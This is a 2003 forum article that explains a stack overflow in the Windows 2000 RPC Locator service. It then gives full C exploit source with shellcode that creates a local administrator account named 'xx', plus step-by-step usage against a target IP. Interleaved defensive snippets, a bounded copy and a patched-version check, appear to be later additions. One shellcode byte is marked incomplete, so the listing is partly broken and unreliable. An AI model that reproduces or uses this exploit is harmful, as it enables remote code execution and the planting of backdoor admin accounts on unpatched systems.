[Analysis] MS RPC LOCATOR Service Exploit for Win2k (New Version)


Created: 2003-04-07

Article type: original

Submitted by: Eyas (EY4S_AT_21CN.COM)

------------------------------------------------------------------------

Created at: 2003-04-05

Last Updated: 2003-04-07

A few days ago I downloaded rpcexp.c from PacketStorm. It did not succeed for me, but it did crash the Locator service, so I decided to dig into it. I later found some information: the bug turned out to be a stack overflow, and the problem is in a wcscpy call. Tracing it, the call chain is as follows:

locator!LOCATOR::nsi_binding_lookup_begin
  |__ locator!LOCATOR::nsi_binding_lookup_begin_name
        |__ locator!CRemoteLookupHandle::Finished
              |__ locator!CBroadcastLookupHandle::Initialize
                    |__ locator!GetBroadcastResults
                          |__ locator!FormQueryPacket
                                |__ wcscpy  <- buffer overflow
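The wcscpy pattern behind this bug, with a bounded replacement beside it, as an added illustration in C that is not part of the original article or of locator.exe. The buffer size QUERY_NAME_CHARS and the function names are assumptions; the article does not state the real size of the FormQueryPacket buffer.

```c
#include <stddef.h>
#include <string.h>
#include <wchar.h>

/* Hypothetical buffer size for this model; the real FormQueryPacket buffer size is
 * not stated in the article, only that the SEH record sits 0x504 bytes in. */
#define QUERY_NAME_CHARS 64

/* Bounded length scan: never reads more than 'limit' characters of 'name'. */
static size_t bounded_wlen(const wchar_t *name, size_t limit)
{
    size_t n = 0;
    while (n < limit && name[n] != L'\0')
        n++;
    return n;
}

/* Vulnerable shape (the bug described above): the entry name is copied with wcscpy
 * into a fixed-size buffer, so a name longer than the buffer overwrites whatever
 * follows it on the stack. Shown for contrast only; the tests never call it. */
void form_query_packet_unsafe(wchar_t packet[QUERY_NAME_CHARS], const wchar_t *name)
{
    wcscpy(packet, name);
}

/* Hardened shape: measure with a bound first and refuse anything that does not fit
 * together with its terminator. Returns the copied length, or -1 when rejected. */
int form_query_packet_safe(wchar_t packet[QUERY_NAME_CHARS], const wchar_t *name)
{
    size_t len = bounded_wlen(name, QUERY_NAME_CHARS);
    if (len >= QUERY_NAME_CHARS)
        return -1;                 /* would overflow (or silently truncate) */
    memcpy(packet, name, (len + 1) * sizeof(wchar_t));
    return (int)len;
}

/* Helper for exercising the check: builds a constructed name of 'chars' L'A's and
 * tries to pack it. Lengths beyond the local scratch size are clamped. */
int try_pack_name_of_length(size_t chars)
{
    wchar_t name[4096];
    wchar_t packet[QUERY_NAME_CHARS];
    if (chars > 4095)
        chars = 4095;
    for (size_t k = 0; k < chars; k++)
        name[k] = L'A';
    name[chars] = L'\0';
    return form_query_packet_safe(packet, name);
}
```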

The return address of GetBroadcastResults sits at offset 0x514 in the buffer. I tested Win2K Chinese and English SP0 through SP3 and the overflow offset is the same on all of them. But if you overwrite the return address of GetBroadcastResults, the code that follows in locator!FormQueryPacket raises a 0xC0000005 access violation, so instead the SEH record is overwritten. The exception handler address is stored at offset 0x504 in the buffer, again identical across the Chinese and English SP0-3 versions. The jump address in Marcin Wolak's rpcexp.c is 0x0090F8F0; my guess is that this was simply where the shellcode happened to sit in memory during his testing, so he jumped straight to it. In my tests wcscpy copied our buffer to somewhere around 0x009xxxxx, but that location varies from platform to platform, sometimes by a lot. This is only a guess, because when I started I could not understand his code :(.

After rewriting the SEH handler to point at a jmp esp, I found something else: when the exception occurs and Windows is preparing to dispatch it, the EBX register happens to hold the address of the slot where the current exception handler address is stored, minus 4. In other words, if the handler address is stored at 0x0098F8EC, EBX is 0x0098F8E8. So the handler address can be overwritten with the address of a call ebx to get our shellcode executed. When I went back to Mo Da's article later, I saw that he had already written this; I had not read it carefully enough :(. But he did not explain the principle behind it, which is why I did not understand it at the time.

The address of a call ebx is not universal across platforms, so I looked at the locator.exe version on each one: SP0 and SP1 have 5.0.2195.1, SP2 has 5.0.2195.2505, SP3 has 5.0.2195.3761, and the post-patch release is 5.0.2195.6136. locator.exe is rarely modified, so I decided to use a call ebx address inside locator.exe itself; DLLs such as kernel32 are updated by almost every hotfix, and a call ebx address taken from them is much less stable. Searching the binaries, SP1 and SP2 share 10 call ebx addresses, while SP1 and SP3, and SP2 and SP3, share none. I also found something amusing: SP1 has a call ebx at 0x0100A8EB and SP3 has one at 0x0100A8EC, hehe.
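A defender's check derived from the version numbers above, added here and not part of the original post: it parses a locator.exe file version string and reports whether it is at or above the patched build 5.0.2195.6136, treating the three pre-patch builds listed above as vulnerable. The function names are my own.

```c
#include <stdio.h>

/* locator.exe build numbers quoted above for Windows 2000: SP0/SP1 5.0.2195.1,
 * SP2 5.0.2195.2505, SP3 5.0.2195.3761, and the post-patch release 5.0.2195.6136. */
static const unsigned FIXED_LOCATOR_BUILD[4] = {5, 0, 2195, 6136};

/* Parse a dotted four-part file version "a.b.c.d" into out[]; returns 0 on success,
 * -1 if the string is not exactly four integers with nothing trailing. */
int parse_file_version(const char *s, unsigned out[4])
{
    char trailing;
    if (s == NULL)
        return -1;
    int n = sscanf(s, "%u.%u.%u.%u%c", &out[0], &out[1], &out[2], &out[3], &trailing);
    return (n == 4) ? 0 : -1;   /* n == 5 means junk after the fourth field */
}

/* Compare field by field. Returns 1 if 'version' is at or above the fixed build,
 * 0 if it is one of the vulnerable builds (or anything older), -1 if unparsable. */
int locator_is_patched(const char *version)
{
    unsigned v[4];
    if (parse_file_version(version, v) != 0)
        return -1;
    for (int i = 0; i < 4; i++) {
        if (v[i] > FIXED_LOCATOR_BUILD[i])
            return 1;
        if (v[i] < FIXED_LOCATOR_BUILD[i])
            return 0;
    }
    return 1;   /* exactly the fixed build */
}
```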

After comparing, I settled on 0x0100AEE5 as the jump address. On SP0, SP1 and SP2:

0:004> u 0x0100aee5
0100AEE5 FFD3    call ebx

On SP3:

0:004> u 0x0100aee5
0100AEE5 40      inc eax
0100AEE6 FFD3    call ebx

The buffer we send is laid out as follows:

| RPC_HEAD_INFO? (8) | NOP (0x4f8) | jmp 0xa (2) | NOP (2) | call ebx addr (4) | NOP (4) | shellcode |

The shellcode has no special requirements except that it must not contain \x00\x00, since wcscpy would treat that as the terminator and truncate it there.

The shellcode is taken directly from another author's article; thanks to him, and to great, backend, ipxodi and the others for their excellent articles on buffer overflows on the Windows platform.

------------------------------------------------------------------------

#define UNICODE
#define RPC_UNICODE_SUPPORTED

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <rpc.h>
#pragma comment(lib, "rpcns4.lib")

// SEH handler offset in the buffer; the overflow point is the same on all Win2K versions
#define SEHOFFSET 0x504

// call ebx address inside the locator.exe process
/*
SP0 SP1 SP2
0:004> u 0x0100aee5
0100AEE5 FFD3    call ebx

SP3
0:004> u 0x0100aee5
0100AEE5 40      inc eax
0100AEE6 FFD3    call ebx
*/
#define JMPADDR "\xe5\xae\x00\x01"
#define JMPOVER "\xeb\x0a\x90\x90"   // jmp 0xa, over the handler address

// hey guy, you will need to modify this code slightly yourself
char shellcode[] =
"\x55\x8b\xec\xeb\x64\x5a\xb8\x04"
"\x00\xf1\x77\x81\x38\x4d\x5a\x90"
"\x00\x74\x03\x48\xeb\xf5\x8b\xd8"
"\x8b\x73\x3c\x03\x0\x8b\x76\x78"   // the fifth byte of this line is incomplete in the source listing
"\x03\xf3\x8b\x7e\x20\x03\xfb\x8b"
"\x4e\x14\x33\xed\x56\x57\x51\x8b"
"\x3f\x03\xfb\x8b\xf2\x33\xc9\x83"
"\xc1\x0e\xf3\xa6\x74\x08\x59\x5f"
"\x83\xc7\x04\x45\xe2\xe7\x59\x5f"
"\x5e\x8b\xcd\x8b\x46\x24\x03\xc3"
"\xd1\xe1\x03\xc1\x33\xc9\x66\x8b"
"\x08\x8b\x46\x1c\x03\xc3\xc1\xe1"
"\x02\x03\xc1\x8b\x00\x03\xc3\xeb"
"\x02\xeb\x37\x8b\xfa\x8b\xf2\x89"
"\x06\x83\xc7\x0f\x57\x53\xff\xd0"
"\x83\x06\x04\x89\x06\x83\xc7\x08"
"\x57\x53\x8b\x46\xfc\xff\xd0\x83"
"\xc6\x04\x89\x06\x33\xc0\x50\x83"
"\xc7\x06\x57\x8b\x46\xfc\xff\xd0"
"\xb8\xff\xff\xff\xff\x50\x8b\x06"
"\xff\xd0\xe8\x5e\xff\xff\xff"
"GetProcAddress\x0"
"WinExec\x0"
"Sleep\x0"
"cmd /c net.exe user xx 1a!.9nh /add && net localgroup administrators xx /add";

DWORD WINAPI func(LPVOID lp)
{
    unsigned char buff[4000];
    unsigned short *pszStrBinding = NULL;
    RPC_NS_HANDLE hNsHandle;
    unsigned long nsSyntaxType = RPC_C_NS_SYNTAX_DEFAULT;
    RPC_STATUS status;
    unsigned long i;

    // fill buff: the entry name prefix "/.:/" as wide characters
    buff[0] = '/';
    buff[1] = 0;
    buff[2] = '.';
    buff[3] = 0;
    buff[4] = ':';
    buff[5] = 0;
    buff[6] = '/';
    buff[7] = 0;

    // NOP sled up to the jmp that sits just before the handler address (see layout above)
    for (i = 8; i < SEHOFFSET - 4; i++)
    {
        buff[i] = '\x90';
    }

    strcpy((char *)&buff[i], JMPOVER);
    // JMPADDR may contain 0, so use memcpy
    memcpy(&buff[i + 4], JMPADDR, 4);
    strcpy((char *)&buff[i + 8], "\x90\x90\x90\x90");
    memcpy(&buff[i + 12], shellcode, sizeof(shellcode));

    RpcTryExcept {
        status = RpcNsBindingLookupBegin(nsSyntaxType,
                                         (unsigned short *)buff,
                                         0,
                                         NULL,
                                         0,
                                         &hNsHandle);
        printf("RpcNsBindingLookupBegin returned 0x%x\n", status);
    }
    RpcExcept(1)
    {
        printf("RPC runtime raised exception 0x%x\n", RpcExceptionCode());
    }
    RpcEndExcept

    return 0;
}

void usage()
{
    printf("\nxlocator - MS RPC Locator Service Exploit for Win2K_en_cn_SP0-3\n"
           "Author: cooleyas@21cn.com 2003-04-07\n"
           "Based on Marcin Wolak's rpcexp.c\n\n"
           "Usage:\n"
           "1. Set registry values on your workstation as below:\n"
           "   HKLM\\Software\\Microsoft\\RPC\\NameService\\NetworkAddress = targetip\n"
           "   HKLM\\Software\\Microsoft\\RPC\\NameService\\ServerNetworkAddress = targetip\n"
           "2. Establish a null session: net use \\\\targetip\\ipc$ \"\" /u:\"\"\n"
           "3. Run the exploit: xlocator\n"
           "If it succeeds, the target will add a user \"xx\" with password \"1a!.9nh\".\n");
}

int __cdecl main(int argc, char **argv)
{
    if (argc != 1)
    {
        usage();
        exit(0);
    }

    CreateThread(NULL, 0, func, NULL, 0, NULL);
    Sleep(4000);
    printf("Done.\n");
    return 0;
} /* end of main */

Please credit the original URL when reposting: https://www.9cbs.com/read-40910.html